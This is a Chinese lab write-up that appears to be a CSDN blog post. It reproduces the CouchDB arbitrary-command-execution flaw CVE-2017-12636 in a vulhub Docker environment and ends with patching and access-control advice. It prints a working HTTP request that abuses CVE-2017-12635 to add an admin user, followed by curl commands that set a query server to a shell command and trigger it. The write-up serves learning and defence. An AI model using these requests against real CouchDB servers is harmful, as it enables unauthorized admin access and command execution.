13 - vulhub - Couchdb 任意命令执行漏洞(CVE-2017-12636)

漏洞名称:Couchdb 任意命令执行漏洞(CVE-2017-12636)

简介:

Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12636是一个任意命令执行漏洞,我们可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

影响版本

小于 1.7.0 以及小于 2.1.1

漏洞原理

可以通过config api修改couchdb的配置query_server,这个配置项在设计、执行view的时候将被运行。

CouchDB管理用户可以通过HTTP(S)配置数据库服务器,其中可以启用的配置选项包括操作系统级二进制文件的路径。这允许CouchDB管理员用户以CouchDB用户的身份执行任意shell命令,包括从公共互联网上下载和执行脚本。

漏洞复现

环境准备

Couchdb 2.x和1.x的API接口有一定的区别,所以这个漏洞的利用方式也不同。本环境启动是1.6.0版本,如果你想测试2.1.0版本,可以启动CVE-2017- 12635附带的环境。

靶机环境   139.196.87.102  (vulhub)
攻击机环境  192.168.8.137  (虚拟机 Ubuntu 20、Java1.8、Burp)

启动 Couchdb 垂直权限绕过漏洞 环境

1.进入 vulhub 的 Couchdb 任意命令执行漏洞 路径
cd /usr/local/tools/vulhub/couchdb/CVE-2017-12636

2.编译并启动环境
docker-compose up -d

3.查看环境运行状态
docker ps | grep vulhub

在这里插入图片描述


启动完成后,访问http://139.196.87.102:5984/浏览Couchdb的欢迎页面。


在这里插入图片描述


漏洞检测

漏洞检测

开发或运维人员检查是否使用了受影响版本范围内的Apache CouchDB,是否配置了强口令和网络访问控制策略。

漏洞利用

该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用 CVE-2017-12635 先增加一个管理员用户。

增加管理用户的数据包如下

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 139.196.87.102:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

在这里插入图片描述


1.7.0 以下的说明
依次执行如下请求即可触发任意命令执行:

curl -X PUT 'http://vulhub:vulhub@139.196.87.102:5984/_config/query_servers/cmd' -d '"id >/tmp/success"'
curl -X PUT 'http://vulhub:vulhub@139.196.87.102:5984/vultest'
curl -X PUT 'http://vulhub:vulhub@139.196.87.102:5984/vultest/vul' -d '{"_id":"770895a97726d5ca6d70a22173005c7b"}'
curl -X POST 'http://vulhub:vulhub@139.196.87.102:5984/vultest/_temp_view?limit=10' -d '{"language":"cmd","map":""}' -H 'Content-Type:application/json'

其中,vulhub:vulhub为管理员账号密码。

第一个请求是添加一个名字为cmd的query_servers,其值为"id >/tmp/success",这就是我们要执行的命令。

第二、三个请求是添加一个数据库和文档,这里添加了一个可以查询的。

第四个请求在这个数据库里进行,因为我将其设置为cmd,这里就是我最初cmd的开始添加的命名的query_servers最后触发命令执行。


在这里插入图片描述


验证漏洞利用是否成功

进入容器查看 /tmp/ 路径下 是否生成 success 文件


在这里插入图片描述


修复建议

1.公网Apache CouchDB实例

建议升级到最新版本。

使用ECS安全组或防火墙策略,限制CouchDB端口暴露在互联网,设置精细化网络访问控制。

开启认证功能,不要使用默认账号口令,配置自定义账号和强口令,防止暴力破解攻击事件。

2.内网Apache CouchDB实例

使用ECS安全组或防火墙策略,限制CouchDB端口暴露在互联网,设置精细化网络访问控制。

开启认证功能,不要使用默认账号口令,配置自定义账号和强口令,防止暴力破解攻击事件。

关于 2.1.0 以下的说明及EXP利用方式

参考:https://blog.csdn.net/whatday/article/details/106618050

参考:https://www.freesion.com/article/7205843932/

参考:https://www.linuxlz.com/aqld/2315.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

哈哥撩编程

多点...少点...多少给点?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值